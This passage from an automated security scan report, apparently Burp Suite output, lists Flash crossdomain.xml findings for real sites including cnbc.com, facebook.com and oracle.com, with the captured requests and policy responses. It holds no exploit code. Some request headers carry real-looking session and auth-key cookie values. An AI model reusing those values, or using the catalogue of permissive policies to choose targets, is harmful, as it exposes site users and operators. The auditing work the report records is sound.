Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:55 GMT
Via: 1.1 C aicache6
Content-Length: 3839
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:55 GMT

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.116. http://www.csc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:42 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:38:44 GMT
Accept-Ranges: bytes
Content-Length: 256
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:42 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-from domain="assets1.csc.com" />
...[SNIP]...

4.117. http://www.deloitte.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deloitte.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sat, 09 Jul 2011 09:03:24 GMT
Accept-Ranges: bytes
ETag: "3d5248f173ecc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:56:56 GMT
Content-Length: 195
Connection: close

...<cross-domain-policy>
   <allow-access-from domain="*.deloitte.com" />
   <allow-access-from domain="*.tohmatsu.com" />
   <allow-access-from domain="*.brightcove.com" />
</cross-domain-policy>

4.118. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.80.38
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.119. http://www.fetchback.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...

4.120. http://www.marykay.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/xml
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "33c39dfd521cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=964365EE47EE74B09594D9AC3B884E28; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<cross-domain-policy>
<allow-access-from domain="*.ai-media.com" />
<allow-access-from domain="*.marykay.com" />
</cross-domain-policy>

4.121. http://www.msnbc.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 3839
Cache-Control: max-age=86
Expires: Tue, 06 Sep 2011 15:07:00 GMT
Date: Tue, 06 Sep 2011 15:05:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.122. http://www.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=309450997205923259,0)
Date: Tue, 06 Sep 2011 15:53:59 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
...[SNIP]...
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.123. http://www.oracleimg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracleimg.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=194754870172961622,0)
Date: Tue, 06 Sep 2011 15:54:07 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
...[SNIP]...
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.124. http://www.sapient.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:27f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:32 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.125. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 06 Sep 2011 15:34:00 GMT
Expires: Tue, 06 Sep 2011 15:34:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.126. http://www2.znode.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.znode.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.znode.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:09 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-s2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.127. http://1215.ic-live.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1215.ic-live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1215.ic-live.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:50 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:10 GMT
ETag: "1320541-1c8-49eb15936b480"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-16
X-Cache-Lookup: MISS from i2a-coll-16:80
Via: 1.0 i2a-coll-16:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin5.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin5.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 17:05:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=640418F0570BDEEB38606A0E869DD5BA; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

4.129. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:11 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:11 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.130. https://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

